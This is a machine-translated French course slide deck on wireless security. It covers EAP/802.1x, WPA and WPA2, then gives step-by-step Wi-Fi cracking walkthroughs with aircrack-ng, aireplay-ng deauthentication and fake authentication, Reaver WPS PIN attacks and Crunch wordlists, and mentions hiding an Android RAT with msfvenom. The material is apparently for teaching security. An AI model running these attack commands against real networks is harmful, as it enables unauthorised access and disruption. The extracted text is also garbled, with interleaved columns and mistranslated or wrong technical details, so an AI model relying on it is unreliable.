Le supplicant est un logiciel utilisé par la machine cliente pour Il s'agit du contrôleur d'accès. C'est un facilitateur qui transmet et traduit les
l'authentification. ex : secureW2, wpa supplicant. conversations entre le demandeur et le serveur d'authentification
La manière dont le demandeur encapsule les paquets EAP dépend du principal. Il suit les instructions de ce serveur pour décider à qui autoriser ou

type de réseau sur lequel il est utilisé. bloquer l'accès au réseau. Par exemple, les NAS sont :

sur un LAN, il sera encapsulé dans le protocole EAPOL ;


un commutateur géré avec prise en charge de 802.1x sur le LAN

sur un WLAN, il sera encapsulé dans


Protocole EAPOWLAN ; un point d'accès avec sécurité Wi­Fi WPA2­Enterprise

serveur d'authentification backend


C'est le contrôleur central qui décide à qui accorder l'accès. ex.
RADIUS, FreeRadius, openRadius, Aegis, IAS (Microsoft), ACS
(Cisco)
33/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Composants du PAE

Composants du PAE

34/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Avec EAP, le processus d'authentification consiste en un échange de messages entre la station terminale et le service d'authentification (utilisant généralement un
NAS). EAP définit quatre types de messages :

EAPOL­démarrage

EAPOL­start est émis par le demandeur pour annoncer sa présence à l'authentificateur.


Une fois que l'authentificateur détecte le demandeur, il démarre l'interaction avec ce client à l'aide du paquet EAPOL

Paquet EAPOL Demande EAP

Le paquet EAPOL contient un champ de code définissant le type de message EAP­Request et EAP­Response contiennent également un champ de type.
Voici les types :

35/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Comprendre les étapes du dialogue EAP

Étapes du dialogue EAP


Le Supplicant s'annonce avec EAPOL­Start ;

L' authentificateur envoie l'EAPOL − Paquet − > Eap − Requête − > Identité au demandeur (Remarque : le serveur backend n'est
pas impliqué à cette étape) ;
Le demandeur fournit son identité avec EAPOL − Paquet − > Eap − Réponse − > Identité
Lorsque l' authentificateur reçoit cette réponse, il la convertit en paquet Radius − Access− > Request contenant
Message EAP AVP ;
Réponse du service d'authentification backend au paquet de requête Radius − Access− > en envoyant un paquet de
défi Radius − Access− > contenant l'AVP EAP­Message à l'authentificateur. Cet AVP EAP­Message contient les données nécessaires à
l'envoi d'un défi MD5 au demandeur ;

36/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des Composants du PAE
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Comprendre les étapes du dialogue EAP

Étapes du dialogue EAP


L' authentificateur utilise le contenu de l'AVP EAP­Message pour créer
EAPOL − Paquet − > Eap − Requête − > MD5 − Défi et l'envoie au Supplicant ;

Le demandeur utilise ce défi pour renvoyer une réponse contenant le mot de passe crypté de l'utilisateur à l'intérieur d'un
EAPOL − Paquet − > Eap − Réponse − > MD5 − Paquet de défi ;

Ce paquet est à nouveau converti en Radius − Access− > Request contenant l'AVP EAP­Message ;

Si ce mot de passe a été fourni correctement, le serveur RADIUS répondra avec un paquet Radius − Access − > Accept contenant un message
AVP EAP à l' authentificateur

L' authentificateur va maintenant ouvrir le port sur le commutateur pour que d'autres trafics puissent démarrer

L' authentificateur enverra également un EAPOL − Paquet − > Eap − Succès au demandeur pour l'informer de la
succès ;

37/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Conversation EAP (dialogue EAP)

38/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Méthodes EAP

Les méthodes EAP sont des méthodes d'authentification définies par le protocole EAP. EAP
définit très peu de méthodes, mais permet d'en ajouter d'autres. Voici quelques­unes :

Méthodes EAP Méthodes EAP


EAP/MD5 : basé sur le protocole CHAP ; EAP/TLS : basé sur TLS (nouvelle version du protocole SSL),
démarre par une poignée de main où le client et le serveur
EAP/MS­CHAP­v2 utilise MS­CHAP­v2
échangent
EAP/OTP : utilise un mot de passe à usage unique
EAP/TTLS :
EAP/GTC : utilise une carte à jeton générique
PAE/PAEP :
EAP/SIM : utilisé pour authentifier l'utilisation via une carte SIM
PAE/RAPIDE :
39/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil Atténuation
et contre­mesures des attaques de réseau WiFi Portail captif WiFi (Coovachilli,
alcasar, OTP)
Résumé

Format des messages EAP


Les messages EAP ont le format ci­dessous :

Format du message EAP

Tableau – Format des messages EAP

Code Identifiant ...Données Longueur

Code : 1 octet représentant le type du message

Identifiant : 1 octet utilisé pour faire correspondre les requêtes et les réponses

Longueur : 2 octets, la longueur totale du message

Données : quelle que soit la taille, ce sont les données réelles.

40/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil Atténuation
et contre­mesures des attaques de réseau WiFi Portail captif WiFi (Coovachilli,
alcasar, OTP)
Résumé

Format des messages EAP


Code de demande et de réponse EAP :

Code EAP

Tableau – Code EAP


Identifiant de code Longueur
...Données

Requête : Les requêtes sont identifiées par la valeur de code 1 ;

Réponse : Les réponses sont identifiées par la valeur de code 2 ;

Succès : Les demandes sont identifiées par la valeur de code 3 ;

Échec : les réponses sont identifiées par la valeur de code 4

41/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

EAP et menaces à la sécurité

Défis de sécurité du WLAN


Un mécanisme d'authentification WLAN robuste doit
garantissent les propriétés suivantes : Défis de sécurité du WLAN
Authentification mutuelle : une authentification
Résistance aux attaques par dictionnaire : si un demandeur
bidirectionnelle entre le demandeur et l'AAAS
utilise un mot de passe potentiellement devinable et qu'un
Confidentialité de l'identité : l'identité de la demande EAP attaquant a accès à des données sensibles dérivées du mot
et l'identité de la réponse sont envoyées en texte clair et de passe, une attaque par dictionnaire peut se produire.
sans aucune précaution, l'attaquant peut facilement
Dérivation de clés de session fortes : l'utilisation de clés de
découvrir l'identité du demandeur.
session statiques entre homologues peut faciliter la découverte
Résistance aux attaques par relecture : si un attaquant de clés secrètes par un attaquant
écoute et enregistre le processus d'authentification d'un demandeur
valide et le rejoue pour accéder au réseau, une attaque par
relecture réussit.

42/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Introduction à WPA et WPA2

Comme nous l'avons vu, la norme 802.1x offre une gamme de mécanismes d'authentification (mot de passe, tunneling TLS, carte à puce, certificat
électronique) centralisés sur un service d'authentification, avec diverses techniques de chiffrement. Ces technologies sont utilisées sur les infrastructures
filaires. Quelles sont les techniques utilisées sur les réseaux Wi­Fi pour renforcer la sécurité ?

43/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Introduction à WPA et WPA2

Le groupe de travail 802.11i a été créé pour définir une solution sécurisée pour les réseaux Wi­Fi. Cependant, avant la ratification des spécifications 802.11i, la Wi­Fi
Alliance propose le protocole d'authentification Wi­Fi (WPA). WPA et WPA2 partagent la même architecture. Cependant,

WPA utilise uniquement TKIP pour le cryptage

WPA n'est disponible qu'en mode BSS, c'est­à­dire que l'infrastructure Ad­Hoc ne peut pas utiliser WPA

WPA2 utilise les algorithmes TKIP ou AES pour le cryptage des données.

44/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Introduction à WPA et WPA2

WPA Home ou WPA PSK WPA Entreprise


La clé pré­partagée WPA est le mécanisme WPA le plus simple. WPA Enterprise utilise l'infrastructure 802.1x. Cela signifie que WPA
Elle consiste à utiliser une clé partagée sur l'AP et ses clients. Enterprise requiert :
En tant que tel, il est similaire au WEP, mais au lieu de saisir la clé
un authentificateur ;
elle­même, l'utilisateur doit fournir une phrase secrète et cette
phrase secrète est utilisée pour calculer le PSK. un service d'authentification backend ;
postes de travail.

45/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Mécanismes de cryptage

TKIP CCMP
WPA utilise TKIP (Temporal Key Integrity Protocol basé sur l'algorithme WPA peut également utiliser CCMP (Counter­Mode/CBC­Mac Protocol).
RC4 pour le cryptage des données. Mais il atténue les vulnérabilités CCMP est une alternative plus sécurisée à TKIP. [Link]
en augmentant la taille de l'IV. wiki/
CCMP_(cryptography )

AES
AES : Advanced Encription Standard est un cryptage à clé symétrique
utilisé dans WPA2 en remplacement de TKIP

46/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Aperçu
Introduction à la sécurité sans fil
Sécurité sans fil
Confidentialité équivalente filaire (WEP)
802.1x et EAP
Accès protégé Wi­Fi (WPA) Introduction à WPA et WPA2
Piratage WPA
Techniques de cryptage
Brève sécurité des appareils Android
sécurité de l'IoT
Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau Wi­Fi
Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Attaques WEP Attaque WPA, WPA2


root@hero:~# iwconfig 1>> Sondez le réseau Wi­Fi disponible :
... root@hero:~# airodump­ng mon0
wlan0 IEEE 802.11abgn ESSID : désactivé/tout ...
Mode : AP géré : non associé Tx­Pw = 22 dBm CH ­1][ Écoulé : 12 s][ 2017­06­14 13:08
Limite courte de nouvelle tentative : 7 RTS thr : désactivé Fragment thr : désactivé BSSID PWR Beac #Data, #/s CH MB ENC CIPH AUTH ESSID
Clé de chiffrement : désactivée 4C:5E.. ­85 1 0 BIZNet 0 ­1 54e. OUVERT
Gestion de l'alimentation : désactivée 4C:5E.. ­77 1 0 4C:5E.. 6 54e. WPA2 CCMP PSK DUMMYnet
­66 1 0 4E:5E.. ­66 1 0 6 54e. OPN Wspot

root@hero : ~# airmon­ng démarre wlan0 0 0 0 6 54e. WPA2 CCMP MGT Reso


...
Pilote de chipset d'interface BSSID Sondes de taux de paquets perdus de la station PWR

wlan0 Inconnu iwlwifi ­ [phy0]


(mode moniteur activé sur mon1)
mon0 Inconnu iwlwifi ­ [phy0] La sonde affiche les réseaux Wi­Fi disponibles avec authentification de prise en charge
cryptage et leur bssid
root@hero:~# iwconfig
mon0 IEEE 802.11abgn Mode : Puissance d'émission du moniteur = 0 dBm
Limite courte de nouvelle tentative : 7 RTS thr : désactivé Fragment thr : désactivé
Gestion de l'alimentation : activée
47/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

attaques WEP attaques WEP


2>> Choisissez un bssid sur lequel démarrer la capture : 3>>Connectez un client et envoyez un paquet pour démarrer la capture :
root@hero:~#airodump­ng mon0 ­­bssid 4C:.. ­c 6 ­w wep_out root@hero:~#airodump­ng mon0 ­­bssid 4C:.. ­c 6 ­w wep_out

... ...
CH 6][Écoulé : 4 min][2017­06­14][channel mon0:­1 CH6][ Écoulé : 2 min][ 2017­06­14][canal mon0:­1

BSS PWR RXQ Bea #Données, #/s CH MB ENC CIP AUTH ESSID BSS PWR RXQ Bea #Données, #/s CH MB ENC CIP AUTH ESSID

4C:.. ­77 0 4 0 0 6 54e. WPA2 CCMP PSK DUMMYnet 4C : 0 100 39 13923 8 6 54e. WPA2 CCMP PSK DUMMYnet

Station BSS Taux de puissance Points perdus Sondes BSSID STATION PWR Taux de paquets perdus Sondes 4C:..
[Link] 0 0e­11e 0 13878

airodump­ng attend une association client pour démarrer une capture. Nous devons capturer un grand nombre de paquets (c'est­à­dire IV) pour espérer
que la découverte de la clé soit réussie dans un court laps de temps.

48/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

attaque WEP

Tester l'injection de trafic ARP Créer une fausse authentification


Tous les adaptateurs Wi­Fi ne prennent pas en charge l'injection, alors testez si votre carte est Nécessaire car les AP ignorent les paquets provenant de clients inconnus ou
compatible avec l'injection.
non associés.

5>>Tester l'injection de trafic ARP : 6>>Créer une fausse authentification


root@hero:~#aireplay­ng ­9 ­e DUMMYnet ­a $<ap­mac­ IV pour la découverte de clés :
address> mon0
root@hero:~#aireplay­ng ­1 0 ­a <adresse­ap­
mac> ­h <machine­ip> mon0

En cas de succès, OPN apparaîtra dans le champ AUTH de la capture airodump en cours. Une nouvelle station (votre client avec son adresse MAC) apparaîtra
également dans la liste des stations et le résultat de la commande indiquera : Association réussie.

49/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

attaque WEP

Injecter un paquet ARP conçu pour générer Lancer une attaque de désauthentification
8>>Effectuer une attaque de désauthentification
suffisamment d'IV
7>>Injectez du trafic ARP conçu pour obtenir suffisamment root@hero:~#aireplay­ng ­ ­deauth 10 ­a $<ap­mac­address>
IV pour la découverte de clés : mon0

root@hero:~#aireplay­ng ­3 ­b <adresse­ap­
mac> mon0

50/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

attaque WEP

lorsque airodump­ng est exécuté avec l'option ­w, il stocke la capture dans 4 types de fichiers

attaque WEP
root@hero:~# ls ­lrt wep_out­01.* ­rw­r­­r­­ 1 kiki kiki 2621
juin 14 16:30 wep_out­[Link] ­rw­r­­r­­ 1 kiki kiki 598 juin 14 16:30 wep_out­[Link] ­rw­r­­r­­ 1 kiki kiki
483 juin 14 16:30 wep_out­[Link] ­rw­r­­r­­ 1 kiki kiki 10211472 juin 14 16:30 wep_out­[Link] root@hero:~#

51/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Découvrir la clé

Lancez aircrack­ng pour découvrir la clé

Découvrir la clé WEP


root@hero:~# aircrack­ng wep_out­[Link] root@hero:~#

52/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Attaques de réseau Wi­Fi Aircrack­ng

Attaque de déauthentification

Utilise airreplay­ng avec les options : Utilise – Attaque hors ligne


Attaque par injection deauth (­0)

Utilise airreplay­ng par défaut


Attaque par fausse authentification
Attaque par force brute
Utilise airreplay­ng avec les options : Utilise –
Attaque par relecture ARP fakeauth (­1)

Utilise airreplay­ng avec les options : Utilise –


arpreplay (­3) Attaques de sites Web
Attaque par usurpation d'identité Mac

53/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève introduction
Techniques de cryptage
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Vulnérabilités de sécurité WPA

Comme nous l'avons mentionné précédemment, le WPA était reconnu comme le mécanisme de sécurité le plus sûr depuis son développement au début
des années 2000. Cependant, comme l'indique l'article suivant : [Link]
referrer=200620&showall=1&mcc=616, des chercheurs ont découvert une faille de sécurité.

54/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Aperçu
Introduction à la sécurité sans fil
Sécurité sans fil
Confidentialité équivalente filaire (WEP)
802.1x et EAP
Accès protégé Wi­Fi (WPA) Introduction à WPA et WPA2
Piratage WPA
Techniques de cryptage
Brève sécurité des appareils Android
sécurité de l'IoT
Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau Wi­Fi
Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

faille WPA WPS

[Link]

WPA [Link] Configuration Wi­Fi protégée


Protected Setup (WPS ; à l'origine, Wi­Fi Simple Config) est un réseau
norme de sécurité pour créer un réseau domestique sans fil sécurisé. Une faille de sécurité dans
WPA a été conçu pour répondre Accès activé par WPS configuré avec WPA/WPA2, piratage WPA facile simplement par
les problèmes liés au WEP et fournir un code PIN long de 8 chiffres à l'aide de l'outil Reaver
fournir un meilleur cryptage
Le problème principal du WEP est le
perfusions courtes faille WPA WPS

Dans WPA, chaque paquet est découvrez si le point d'accès est compatible WPS.
crypté avec un caractère unique
Clé temporelle
root@hero:~# wash ­i mon0
WPA et WPA2 sont les
Outil d'analyse de configuration protégée Wi­Fi Wash v1.4
pareil, la seule différence est BSSID Canal ... Version WPS WPS verrouillé ESSID
que WPA2 ajoute CCMP comme ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
algorithme de cryptage [Link].. 1 1.0 Non test1
[Link]... 11 1.0 Non test2
[Link]... 11 1.0 Non test3

55/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction à WPA et WPA2
Brève
Techniques de cryptage
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Utilisez Reaver pour découvrir la clé WPA


root@hero:~# reaver ­b [Link]... ­c 11 ­i mon0 Reaver v1.4 Outil d'attaque de

configuration protégée Wi­Fi saccageur


...
Reaver est un outil de piratage Wi­Fi très
[*]En attente de la balise de [Link]... puissant. Pour découvrir ses options,
[*]Associé à [Link]... (ESSID : test3) lancez simplement Reaver –help
[*]Code PIN WPS : « 12345670 »
[*]WPA PSK : « SECRET »
[*]SSID du point d'accès : « test3 »

56/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Théorie du piratage WPA : poignée de main à quatre voies

Démarrer airodump­ng

root@hero:~#airodump ­c 11 ­­bssid [Link].

Théorie du piratage WPA ­w wpa_handshake_out mon0 BSSID


STATION [Link]...
[Link]...
Contrairement au WEP, les paquets WPA ne
contiennent aucune information utile pour déchiffrer
la clé ;

Les seuls paquets contenant des informations pouvant Capture d'une poignée de main à quatre
nous aider à déchiffrer le mot de passe sont le
paquet de poignée de main ; Attendez qu'un client se connecte ou que le point d'accès se désauthentifie, ou
désauthentifiez un client connecté
Chaque fois qu'un client se connecte à un point
d'accès compatible WPA, une négociation à quatre se root@hero:~#aireplay­ng ­­deauth 4 ­a [Link]...
produit entre le client et le point d'accès ; ­c [Link]... mon0

En capturant la poignée de main, nous pouvons [Link] En attente de trame de balise... sur le canal 11 [Link]
utiliser aircrack­ng pour lancer une attaque par Envoi de 64 DeAuth dirigé...[Link]...]...
liste de mots contre la poignée de main afin de [Link] Envoi de 64 DeAuth dirigés...[Link]...]...
déterminer la clé. [Link] Envoi de 64 DeAuth dirigés...[Link]...]...
[Link] Envoi de 64 DeAuth dirigé...[Link]...]... 57/66 Module 2 : Protocoles
de
Victor OYETOLAÉric ATTOU sécurité des réseaux sans fil : WEP, WAP,
Vous remarquerez que dès que la commande aireplay­ng est validée,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Une fois que vous avez réussi à capturer le paquet de poignée de main WPA, vous devez récupérer une liste de mots sur Internet ou générer la vôtre à l'aide de
l'outil Crunch .

liste de mots+poignée de main= ! ! ! ! !


Maintenant, avec aircrack­ng, utilisez la liste de mots et la poignée de main pour déchiffrer la clé
Créer une liste de mots
root@hero:~#aircrak­ng wpa_handshake_out.cap ­w liste de mots
root@hero:~#./crunch 6 8 123456!"£$% ­o liste de mots ­ta@@@@b

...
Crunch va maintenant générer le nombre de lignes suivant : 53 879

Autres outils de piratage de réseau WiFi


Wifite : est aussi puissant qu'aircrack ;

Fluxion : utilisé pour créer de faux points d'accès ;

58/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Cheval de Troie d'accès à distance (RAT)


Les experts en sécurité définissent les RAT comme des programmes
permettant une surveillance discrète ou un accès non autorisé à l'appareil
d'une victime. Ils sont conçus pour fonctionner en mode serveur C&C.
Appareil mobile : sécurité Voici quelques exemples de RAT bien connus :

Android KjW0rm :
Havex :
Les appareils Android, comme tous les autres appareils mobiles, sont
la cible de nombreuses attaques. L'attaque la plus courante est AlienSpy :
celle du cheval de Troie d'accès à distance.

Cheval de Troie d'accès à distance (RAT)


Il est trop facile de cacher un RAT dans une fausse application (.apk) en
utilisant msfvenom, un module metasploit pour créer cet exploit et
le livrer à un appareil Android distant.

59/66
